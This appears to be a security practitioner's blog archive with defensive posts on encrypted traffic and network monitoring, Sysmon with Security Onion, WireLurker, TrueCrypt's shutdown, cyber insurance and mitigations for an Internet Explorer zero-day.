Sysmon & Security Onion, Part 1: Rise of the Encrypted Web

This is part one of a series of posts that contain key excerpts of my paper, Using Sysmon to Enrich Security Onion’s Host-Level Capabilities.

In the eleven years since Richard Bejtlich wrote his seminal book on Network Security Monitoring, practitioners have seen a number of issues in the last few years that have shown some of the limitations of network-centric monitoring. The rise of encrypted-by-default web traffic, which blinds defenders to most NSM data types is one of those issues.

The collection of NSM data is typically through a TAP or SPAN on a strategic chokepoint in the network. If the network data between the client and server is encrypted, a number of types of NSM data will be useless to the analyst—full content, extracted content, and certain types of alerts. With the revelations of the past few years that a number of governments around the world have been intercepting their citizen’s unencrypted communications, there has been significant interest in encrypting most, if not all of the web traffic around the world. In 2014, CloudFlare, which hosts a content delivery network (CDN) and security services for two million websites, enabled free SSL for all of their customers. They stated, “Having cutting-edge encryption may not seem important to a small blog, but it is critical to advancing the encrypted-by-default future of the Internet. Every byte, however seemingly mundane, that flows encrypted across the Internet makes it more difficult for those who wish to intercept, throttle, or censor the web.” (Prince, 2014)

From a recent study, The Cost of the “S” in HTTPS,  twenty-five thousand residential ADSL customers saw HTTPS usage in uploads accounting for 80% of traffic compared to 45.7% in 2012. (Naylor, et al.) This trend is expected to continue for the foreseeable future.

This increase of encryption will typically be seen in north – south traffic, not necessarily east – west traffic, which means NSM sensors deployed to monitor internal traffic may not be so readily affected. However, sensors deployed at network egress points will certainly be affected unless some type of mitigations is put into place. These mitigations would include proxying the SSL traffic so that the network data could be read, though this solution is limited in practice due to performance, privacy, and liability concerns.


Prince, M. (2014, September 29). Introducing Universal SSL. Retrieved February 12, 2015, from

Naylor, D., Finamore, A., Leontiadis, I., Grunenberger, Y., Mellia, M., Munafò, M., . . . Steenkiste, P. (n.d.). The Cost of the “S” in HTTPS. Retrieved February 12, 2015, from

Tagged , , ,

Using Sysmon To Enrich Security Onion’s Host-Level Capabilities

SANS recently accepted my GCFA Gold paper, Using Sysmon To Enrich Security Onion’s Host-Level Capabilities. The abstract is as follows:

With more network traffic being encrypted, as well as the persistence of advanced adversaries, it is becoming increasingly imperative that there is greater visibility at the host-level. With this greater visibility comes the ability to more efficiently detect and respond to threats. This paper highlights the use of Sysmon to enrich existing Windows host visibility capabilities in Security Onion, as well as how to use this increased visibility in detection and incident response. In this paper, the author has developed custom parsers and rulesets for integrating host-based data into Security Onion, something which to date had not yet been done for this project.

You can find the paper here. [pdf]

You can also find the ELSA Parsers, as well as the OSSEC decoder and rulesets that I wrote, on Github.

In the next month, I will be breaking up some key parts of the paper into a number of blog posts.


Tagged , , , ,

A No-Nonsense Guide to the OpenBSD Firewall

Though this is the 3rd edition, this is the first time I have picked up this book. As a proponent of the *BSDs, I appreciate have good quality material like this book available to overview and then get down into the mechanics of key subsystems, like PF.

I appreciated the clear, concise writing, as well as the multitude of real world examples.

One of the key chapters for me was Chapter 6: Turning the Tables for Proactive Defense. Peter goes in-depth into how PF elegantly handles issues like SSH bruteforcing, as well as how PF handles spam with stuttering, blacklisting and greylisting.

Highly recommended for someone that is interested in working with PF, or is already administrating PF, but looking for some extra help in certain areas.


Tagged ,


Yesterday Palo Alto Networks released a report on a new OSX & iOS malware, WireLurker.  The best write-up I have seen so far is here:

A couple pertinent points:

-Currently only circulated through Chinese warez – seems to be targeting identifying information of users only (possibly to identify key players in the Chinese software-pirating market?)

-The concern is not so much about WireLurker itself, but “…that this technique could be weaponized in the future, and be a viable means of attack on public and private sector machines.”

-If you are interested in detecting if a device has been compromised, see here: – If anybody has IDS sigs yet, please let me know….


Key Takeways:

-Remind users that jailbreaking your phone (whether android or iphone) nets you less security – better yet, enforce policies that disallow jailbreaking devices that have organizational data on it

-“While your own Mac may not be infected with WireLurker, it’s possible others (in your school, college, at work, or public computers) are, so it’s important not to trust any devices other than your own. To help prevent this from accidentally happening, you may wish to pair lock your device using these instructions.”

We need to continue to help foster cultural change that surrounds most of our Mac users – the fallacy that if you have a Mac, you don’t need to worry about security issues… “Only PC users need to worry about that.”

Tagged , , , ,

Liability Insurance & Digital Security Claims

This is part of our blog series of continuous dialogue that you should be having with your Executive Leadership, to make them aware of issues that they should be making organizational decisions on:

“There is ongoing litigation whereby most insurance carriers are pushing back against its clients when it comes to “Cyber” security-related claims under an organization’s general liability insurance. Most recently, the insurance carrier for P.F. Chang is taking legal action against P.F. Chang’s claim that their commercial general liability policy covers defense cost and provides indemnity coverage for their recent credit card breach.

Leadership needs to understand that our general liability coverage will most likely not cover a digital security event, even if the coverage wording is vague (the carrier will most likely still fight against it, to avoid precedent-setting cases). If we want to pursue coverage for digital security issues, we would need to pursue a separate policy/rider specifically for it.”

For more information, continue to the following link.


Tagged , ,

Prevention Eventually Fails….

Organizational leadership needs to understand that no matter the technical & procedural protections that are put in place, prevention eventually fails, especially (but not exclusively) against a targeted attack orchestrated by a motivated adversary. This means that the organization must plan for this eventual “failure”—To be able to detect and respond to these failures.

When this failure occurs, the questions that must be asked from leadership is not “Why did our defenses fail,” rather, “How long did it take for us to detect & respond to this failure?” According to industry sources, the mean time of detection of advanced attackers is around 8 months—This mean that the average organization does not know that they have been severely compromised for 8 months, which is typically more than enough time to achieve the adversary’s goals.

With all that in mind, what is your detection strategy?


Tagged , ,

Outbound Spam Filtering

One configuration setup that I have run into a a number of times is the lack of outbound Spam/Anti-Virus filtering.  The organization in question has their inbound mail queue running through their Anti-Spam/AV filter, but they do not have their outbound mail going through it. When asked about it, typically the response has been, “Never thought about it. We are really only concerned about inbound spam and viruses.” 

Here is my typical response:

When a corporate mailbox is compromised and is used in a spam campaign, how will you know? When the user of the compromised account complains to the helpdesk because of the glut of bounced messages in his inbox? By that time, possibly your only static public IP has been listed on a number of Real-time Blackhole Lists (RBL).

Filtering outbound messages for Spam/Malware helps you detect internal compromised accounts/computers faster than waiting for the user or RBL to alert you.  Just be sure to tweak alerts to get the right kind of alerts when they are needed, so that you don’t fall into alert fatigue.




Tagged , ,

Governance Challenges: The Digital Side of Duty of Care

I have just finished a short paper on Duty of Care, and how some aspects of it applies to the digital world. For instance, consider the following:

A staff member is traveling to a region of the world that is currently embroiled in factional warfare, and there is a higher than average risk of kidnappings. The staff member wants to share about her trip with her online following, and posts to her social media accounts a photo of her (detailed) itinerary for the ten day trip.

A staff member is traveling internationally and stops by an Internet cafe to catch up on business and personal correspondence. Unbeknownst to her, she has exposed herself to a high risk of identity theft because the Internet cafe computers were compromised with keyloggers and other malware

If the staff member’s organization did not have sufficient training to help them understand the risks of social media when traveling and basic computing security, they have opened themselves up to a duty of care negligence case.

You can read more about these issues in the paper, found here. [pdf]

Please feel free to contact me with any questions or comments that you may have.


Tagged ,

New CS-RC Report – TrueCrypt, June 2014

The Polder Consortium Computer Security Response Community (CompSec RC) has published a report that provides analysis of the situation and guidance for IT decision makers.

The IT Security community was bewildered by the May 28, 2014 announcement on the TrueCrypt website declaring “WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues”. The website furthermore directs users to migrate data from disks, volumes and containers previously encrypted with TrueCrypt to “encrypted disks or virtual disk images supported on your platform”.

The situation is made much more difficult by the fact that the TrueCrypt developers have maintained anonymity over the ten year life-cycle of this product. Thus there have been no interviews with the developers and as a result, a lot of conjecture has arisen regarding the mysterious manner in which they terminated the project.

Based on our analysis of this situation we are recommending the following action steps:

  1. It is considered safe (with caveats) to continue using the latest working version (7.1a) but only for the short-term, i.e., the next 6 months. Please do not take this as an endorsement that users should continue using TrueCrypt!
  2. TrueCrypt is no longer a viable option for long-term strategic initiatives. We highly recommend organizations develop a migration plan for transitioning away from TrueCrypt. We may have more specific recommendations at a later date but for guidance see the full report.
  3. We further recommend that users no longer download TrueCrypt or install it on client machines. In particular we recommend against downloading the latest TrueCrypt version 7.2 because there is some (unverified) risk that the TrueCrypt 7.2 install files are compromised. Individuals having TrueCrypt encrypted volumes but not having TrueCrypt already installed should download version 7.1a from GRC’s TrueCrypt? Final Release Repository for the purpose of accessing those files and migrating them to a secure encryption platform.

See the full report here CS-RC Report – TrueCrypt, June 2014.

As a side note, I was the lead contributor for this report.


Tagged ,

IE6 – IE11 0 Day Vulnerability [April/May 2014]


As some of you have no doubt seen, there is a new 0 Day vulnerability in IE6 – IE11 that allows one to bypass some of Window’s primary security mechanisms of ASLR & DEP.  Specifically, the way IE (mis)handles Adobe Flash allowed this issue to happen.  There currently is no patch from Microsoft, but I do expect one within the next couple days.

The initial exploitation of this vulnerability was targeted to IE9 – IE11 and a specific set of users that an APT group was targeting, but we are now seeing more generalized/non-targeted attacks.

There are a few reasons that this is a significant vulnerability, other than the fact that it is a 0 Day…

-According to Microsoft’s current policy of end of life applications, this vulnerability will not be patched on Windows XP—This means that no matter what version of IE you are running on XP (IE6 – IE8), it will always be vulnerable to this exploit unless extra action is taken (see mitigation options below)

-This vulnerability affects such a wide set of IE versions—In 2013, these versions of IE made up 53% of the desktop browser market share [src]

General Mitigation Options:

The following are the top 5 ways to mitigate this exploit—

Disable/Remove Adobe Flash:  Because this vulnerability is really a vulnerability between Flash & IE, disabling or removing Flash will remove the vulnerability.

Enable IE’s “Enhanced Protected Mode” :  EPM was introduced in IE10 as an enhancement to previous versions of IE’s “Protected Mode.”  EPM can have some unintended compatibility issues with other applications/web-apps, so make sure to test before rolling out.

Use the Enhanced Mitigation Experience Toolkit: [SRC] I have discussed EMET quite a bit in the last year, but if you are not aware of what it is, Brian Krebs has a good primer on it. [SRC]

Use a different browser: Because this is a vulnerability in IE’s handling of corrupted flash files, switching to a different browser will mitigate the issue—keep in mind that other installed apps (Microsoft Office, etc) may use the IE engine to render HTML and Flash files, which would bring the particular computer back into the scope of this vulnerability.



Tagged , ,